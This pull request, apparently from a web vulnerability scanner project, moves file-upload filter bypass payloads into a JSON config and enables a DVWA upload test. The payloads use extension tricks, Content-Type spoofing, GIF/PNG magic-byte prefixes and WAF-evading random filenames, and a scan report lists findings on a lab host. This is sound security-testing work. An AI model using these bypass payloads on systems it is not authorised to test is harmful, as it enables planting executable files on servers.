### PR TITLE
[refactor] file_upload 모듈 테스트용 상세 로그 제거, payloads.py 분리

### DIFF
--- a/config/payloads/file_upload_payloads.json
+++ b/config/payloads/file_upload_payloads.json
@@ -1,0 +1,50 @@
+{
+  "extensions": [
+    "php",
+    "php3",
+    "php4",
+    "php5",
+    "phtml",
+    "phar",
+    "inc",
+    "PhP",
+    "pHP",
+    "Php",
+    "php ",
+    "php.",
+    "php/."
+  ],
+  "content_types": [
+    "application/x-php",
+    "image/jpeg",
+    "image/gif",
+    "text/plain"
+  ],
+  "base_names": [
+    "profile_pic",
+    "avatar",
+    "receipt_2026",
+    "document_vfinal",
+    "upload",
+    "img"
+  ],
+  "magic_byte_extensions": [
+    "php5",
+    "phtml",
+    "PhP"
+  ],
+  "classic_payloads": [
+    {
+      "extension": "php%00.jpg",
+      "prefix": "upload",
+      "content_type": "image/jpeg",
+      "attack_type": "Null_Byte_Injection"
+    },
+    {
+      "extension": "php.jpg",
+      "prefix": "document",
+      "content_type": "image/jpeg",
+      "attack_type": "Double_Extension"
+    }
+  ]
+}

--- a/mock_parser.py
+++ b/mock_parser.py
@@ -77,18 +77,18 @@ def get_dvwa_mock_surfaces(
         #     description="DVWA Brute Force (GET, with CSRF token)",
         #     dynamic_tokens=["user_token"],
         # ),
-        AttackSurface(
-            url=f"{root}/vulnerabilities/brute/",
-            method=HttpMethod.GET,
-            param_location=ParamLocation.QUERY,
-            parameters={
-                "username": "admin",
-                "password": "password",
-                "Login": "Login",
-            },
-            cookies=auth_cookies,
-            description="DVWA Brute Force (GET, no CSRF token)",
-        ),
+        # AttackSurface(
+        #     url=f"{root}/vulnerabilities/brute/",
+        #     method=HttpMethod.GET,
+        #     param_location=ParamLocation.QUERY,
+        #     parameters={
+        #         "username": "admin",
+        #         "password": "password",
+        #         "Login": "Login",
+        #     },
+        #     cookies=auth_cookies,
+        #     description="DVWA Brute Force (GET, no CSRF token)",
+        # ),
         # AttackSurface(
         #     url=f"{root}/vulnerabilities/sqli/",
         #     method=HttpMethod.GET,
@@ -97,19 +97,19 @@ def get_dvwa_mock_surfaces(
         #     cookies=auth_cookies,
         #     description="DVWA SQL Injection (GET)",
         # ),
-        # AttackSurface(
-        #     url=f"{root}/vulnerabilities/upload/",
-        #     method=HttpMethod.POST,
-        #     # Multipart is represented as form data in current request builder.
-        #     param_location=ParamLocation.BODY_FORM,
-        #     parameters={
-        #         "MAX_FILE_SIZE": "100000",
-        #         "uploaded": "",
-        #         "Upload": "Upload",
-        #     },
-        #     cookies=auth_cookies,
-        #     description="DVWA File Upload (POST)",
-        # ),
+        AttackSurface(
+            url=f"{root}/vulnerabilities/upload/",
+            method=HttpMethod.POST,
+            # Multipart is represented as form data in current request builder.
+            param_location=ParamLocation.BODY_FORM,
+            parameters={
+                "MAX_FILE_SIZE": "100000",
+                "uploaded": "",
+                "Upload": "Upload",
+            },
+            cookies=auth_cookies,
+            description="DVWA File Upload (POST)",
+        ),
         # AttackSurface(
         #     url=f"{root}/vulnerabilities/sqli_blind/",
         #     param_location=ParamLocation.QUERY,

--- a/modules/file_upload/module.py
+++ b/modules/file_upload/module.py
@@ -29,10 +29,7 @@ class FileUploadModule(BaseModule):
         return parameter_list
 
     def analyze(self, response, payload, elapsed_time, original_res=None, requester=None) -> bool:
-        is_vuln, evidences = detect_file_upload(response=response, payload=payload)
-        if is_vuln:
-            for evidence in evidences:
-                print(f"[+] [{self.name}] {evidence}")
+        is_vuln, _ = detect_file_upload(response=response, payload=payload)
         return is_vuln
 
     async def verify(
@@ -68,7 +65,6 @@ class FileUploadModule(BaseModule):
             verify_urls.append(dynamic_url)
 
         if not verify_urls:
-            print(f"[-] [{self.name}] [Verify] no dynamic upload path found in response")
             return False
 
         request_kwargs = {}
@@ -91,8 +87,6 @@ class FileUploadModule(BaseModule):
             if "<?php" in body.lower() or "&lt;?php" in body.lower():
                 continue
 
-            print(f"[+] [{self.name}] [Verify] executable upload confirmed: {verify_url}")
             return True
 
-        print(f"[-] [{self.name}] [Verify] upload success but execution not confirmed")
         return False

--- a/modules/file_upload/payloads.py
+++ b/modules/file_upload/payloads.py
@@ -1,6 +1,9 @@
-import uuid
+import json
 import random
+import uuid
 from dataclasses import dataclass
+from pathlib import Path
+
 
 @dataclass(slots=True, frozen=True)
 class FilePayload:
@@ -9,72 +12,81 @@ class FilePayload:
     content_type: str
     attack_type: str
 
+
+_CONFIG_PATH = Path("config") / "payloads" / "file_upload_payloads.json"
+
+
+def _load_payload_config() -> dict:
+    if not _CONFIG_PATH.exists():
+        raise FileNotFoundError(f"File upload payload config not found: {_CONFIG_PATH}")
+    try:
+        with _CONFIG_PATH.open("r", encoding="utf-8") as f:
+            loaded = json.load(f)
+    except OSError as exc:
+        raise OSError(f"Failed to read payload config: {_CONFIG_PATH}") from exc
+    except json.JSONDecodeError as exc:
+        raise ValueError(f"Invalid JSON payload config: {_CONFIG_PATH}") from exc
+    if not isinstance(loaded, dict):
+        raise ValueError(f"Payload config root must be object: {_CONFIG_PATH}")
+    return loaded
+
+
 def generate_payloads() -> list[FilePayload]:
-    # 1. 기본 웹쉘
+    config = _load_payload_config()
+
     base_webshell = b"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>"
-    
-    # 2. 매직 바이트(Magic Bytes)가 포함된 웹쉘
-    # 파일 맨 앞에 GIF89a 시그니처를 넣어 진짜 이미지인 것처럼 서버의 검증 로직을 속임
     gif_webshell = b"GIF89a;\n" + base_webshell
     png_webshell = b"\x89PNG\r\n\x1a\n\0\0\0\rIHDR" + base_webshell
 
-    payloads = []
-    
-    # [그룹 A] 확장자 우회 리스트 (대소문자 및 Windows OS 특성 반영)
-    extensions = [
-        "php", "php3", "php4", "php5", "phtml", "phar", "inc",
-        "PhP", "pHP", "Php",           # 대소문자 우회 검사
-        "php ", "php.", "php/."        # Windows 환경 특수문자 트릭 (저장 시 뒤의 문자 잘림)
-    ]
-
-    # [그룹 B] Content-Type 스푸핑 리스트
-    content_types = [
-        "application/x-php",           # 정상적인 PHP 타입
-        "image/jpeg",                  # 이미지 위장
-        "image/gif",
-        "text/plain"                   # 텍스트 위장
-    ]
-
-    # 자연스러운 기본 파일명 후보군 (프로필 사진, 영수증, 문서 등 위장)
-    base_names = ["profile_pic", "avatar", "receipt_2026", "document_vfinal", "upload", "img"]
+    payloads: list[FilePayload] = []
+    extensions = [str(ext) for ext in config.get("extensions", []) if str(ext)]
+    content_types = [str(ct) for ct in config.get("content_types", []) if str(ct)]
+    base_names = [str(name) for name in config.get("base_names", []) if str(name)] or ["upload"]
 
     def get_random_filename(ext: str, prefix: str = "") -> str:
-        """
-        IPS/WAF 정규식 탐지를 우회하기 위해 자연스러운 이름 + 랜덤 문자열로 파일명을 생성합니다.
-        예: avatar_8f3a2b.php
-        """
         if not prefix:
             prefix = random.choice(base_names)
-        random_str = uuid.uuid4().hex[:6] # 6자리 랜덤 해시
+        random_str = uuid.uuid4().hex[:6]
         return f"{prefix}_{random_str}.{ext}"
 
-    # 1. 크로스 콤비네이션 공격 (모든 확장자 x 모든 Content-Type 결합)
     for ext in extensions:
         for c_type in content_types:
             filename = get_random_filename(ext)
+            subtype = c_type.split("/", 1)[-1]
             payloads.append(
-                FilePayload(filename, base_webshell, c_type, f"Bypass_{ext}_CT_{c_type.split('/')[1]}")
+                FilePayload(filename, base_webshell, c_type, f"Bypass_{ext}_CT_{subtype}")
             )
 
-    # 2. 매직 바이트 (파일 내용 검사 우회) 공격
-    # 파일 확장자도 속이고, Content-Type도 속이고, 실제 파일 내용물(헤더)까지 속이는 3단 콤보
     payloads.append(FilePayload(get_random_filename("php", "avatar"), gif_webshell, "image/gif", "Magic_Byte_GIF"))
     payloads.append(FilePayload(get_random_filename("php", "receipt"), png_webshell, "image/png", "Magic_Byte_PNG"))
-    
-    # 매직 바이트 + 확장자 우회 콤보
-    for ext in ["php5", "phtml", "PhP"]:
-        filename = get_random_filename(ext, "image")
-        payloads.append(FilePayload(filename, gif_webshell, "image/gif", f"Magic_Byte_GIF_{ext}"))
 
-    # 3. 기타 클래식 기법
-    payloads.append(FilePayload(get_random_filename("php%00.jpg", "upload"), base_webshell, "image/jpeg", "Null_Byte_Injection"))
-    payloads.append(FilePayload(get_random_filename("php.jpg", "document"), base_webshell, "image/jpeg", "Double_Extension"))
-    
+    for ext in config.get("magic_byte_extensions", []):
+        ext_text = str(ext).strip()
+        if not ext_text:
+            continue
+        filename = get_random_filename(ext_text, "image")
+        payloads.append(FilePayload(filename, gif_webshell, "image/gif", f"Magic_Byte_GIF_{ext_text}"))
+
+    for classic in config.get("classic_payloads", []):
+        if not isinstance(classic, dict):
+            continue
+        ext = str(classic.get("extension", "")).strip()
+        if not ext:
+            continue
+        prefix = str(classic.get("prefix", "")).strip()
+        content_type = str(classic.get("content_type", "application/x-php")).strip()
+        attack_type = str(classic.get("attack_type", f"Classic_{ext}")).strip()
+        payloads.append(
+            FilePayload(
+                get_random_filename(ext, prefix),
+                base_webshell,
+                content_type,
+                attack_type,
+            )
+        )
+
     return payloads
 
 
 def get_file_upload_payloads() -> list[FilePayload]:
-    """
-    Backward-compatible entrypoint used by FileUploadModule.
-    """
     return generate_payloads()

--- a/scan_report.json
+++ b/scan_report.json
@@ -1,0 +1,469 @@
+{
+  "metadata": {
+    "scan_time": "2026-04-29 16:27:44",
+    "summary": {
+      "queued": 59,
+      "completed": 59,
+      "failures": 0,
+      "findings": 24
+    }
+  },
+  "vulnerabilities": [
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='document_vfinal_d52b36.php', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='application/x-php', attack_type='Bypass_php_CT_x-php')",
+        "type": "Bypass_php_CT_x-php",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0151,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='receipt_2026_555ae7.php', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/jpeg', attack_type='Bypass_php_CT_jpeg')",
+        "type": "Bypass_php_CT_jpeg",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0284,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='document_vfinal_2c45d6.php3', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/jpeg', attack_type='Bypass_php3_CT_jpeg')",
+        "type": "Bypass_php3_CT_jpeg",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0297,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='upload_51f907.php', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='text/plain', attack_type='Bypass_php_CT_plain')",
+        "type": "Bypass_php_CT_plain",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0357,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='profile_pic_35837e.php3', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='application/x-php', attack_type='Bypass_php3_CT_x-php')",
+        "type": "Bypass_php3_CT_x-php",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0283,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='avatar_286879.php3', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Bypass_php3_CT_gif')",
+        "type": "Bypass_php3_CT_gif",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0322,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='document_vfinal_b15589.php', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Bypass_php_CT_gif')",
+        "type": "Bypass_php_CT_gif",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.034,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='upload_ff862d.php3', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='text/plain', attack_type='Bypass_php3_CT_plain')",
+        "type": "Bypass_php3_CT_plain",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0352,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='upload_e1d42a.php4', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='application/x-php', attack_type='Bypass_php4_CT_x-php')",
+        "type": "Bypass_php4_CT_x-php",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0394,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='profile_pic_7ee7a6.php4', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/jpeg', attack_type='Bypass_php4_CT_jpeg')",
+        "type": "Bypass_php4_CT_jpeg",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0401,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='document_vfinal_4d9a35.php4', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='text/plain', attack_type='Bypass_php4_CT_plain')",
+        "type": "Bypass_php4_CT_plain",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0175,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='profile_pic_d2b9f3.phtml', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='application/x-php', attack_type='Bypass_phtml_CT_x-php')",
+        "type": "Bypass_phtml_CT_x-php",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0179,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='img_2d3fba.php4', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Bypass_php4_CT_gif')",
+        "type": "Bypass_php4_CT_gif",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0147,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='upload_e5d465.php5', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/jpeg', attack_type='Bypass_php5_CT_jpeg')",
+        "type": "Bypass_php5_CT_jpeg",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0148,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='img_269256.phtml', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/jpeg', attack_type='Bypass_phtml_CT_jpeg')",
+        "type": "Bypass_phtml_CT_jpeg",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0227,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='document_vfinal_4881a2.php5', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Bypass_php5_CT_gif')",
+        "type": "Bypass_php5_CT_gif",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0167,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='profile_pic_c90d4b.php5', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='application/x-php', attack_type='Bypass_php5_CT_x-php')",
+        "type": "Bypass_php5_CT_x-php",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0176,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='document_vfinal_beb6fa.php5', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='text/plain', attack_type='Bypass_php5_CT_plain')",
+        "type": "Bypass_php5_CT_plain",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0176,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='profile_pic_6af31e.phtml', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Bypass_phtml_CT_gif')",
+        "type": "Bypass_phtml_CT_gif",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0257,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='img_cd6d16.phtml', content=b\"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='text/plain', attack_type='Bypass_phtml_CT_plain')",
+        "type": "Bypass_phtml_CT_plain",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0253,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='avatar_6fbcf4.php', content=b\"GIF89a;\\n<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Magic_Byte_GIF')",
+        "type": "Magic_Byte_GIF",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0164,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='image_6e14a1.php5', content=b\"GIF89a;\\n<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Magic_Byte_GIF_php5')",
+        "type": "Magic_Byte_GIF_php5",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0187,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='image_a2a00e.phtml', content=b\"GIF89a;\\n<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/gif', attack_type='Magic_Byte_GIF_phtml')",
+        "type": "Magic_Byte_GIF_phtml",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0192,
+        "error_log": null
+      }
+    },
+    {
+      "target": {
+        "url": "http://snowden.kr/vulnerabilities/upload/",
+        "method": "POST",
+        "location": "BODY_FORM",
+        "parameter": "uploaded"
+      },
+      "attack_info": {
+        "payload_value": "FilePayload(filename='receipt_8ac35b.php', content=b\"\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>\", content_type='image/png', attack_type='Magic_Byte_PNG')",
+        "type": "Magic_Byte_PNG",
+        "severity": "high",
+        "description": ""
+      },
+      "evidence": {
+        "status_code": 200,
+        "response_time": 0.0175,
+        "error_log": null
+      }
+    }
+  ]
+}


### PR DESCRIPTION
## 📌 PR 목적 (What)
- 디버깅을 위해 만들어 놨던 상세 로그를 제거.
## 🛠️ 주요 변경 사항 (How)
- 실행 시 동작 중에는 progress만 출력되도록 수정.
- `payloads.py` 파일을 `file_upload_payloads.json` 파일과 'payloads.py` 파일로 분리.

### 추가 구현 사항
현재는 변형 동작이 내장되어 있음. 차후 페이로드 확장 시 타 모듈들처럼 레벨 단위로 분리.
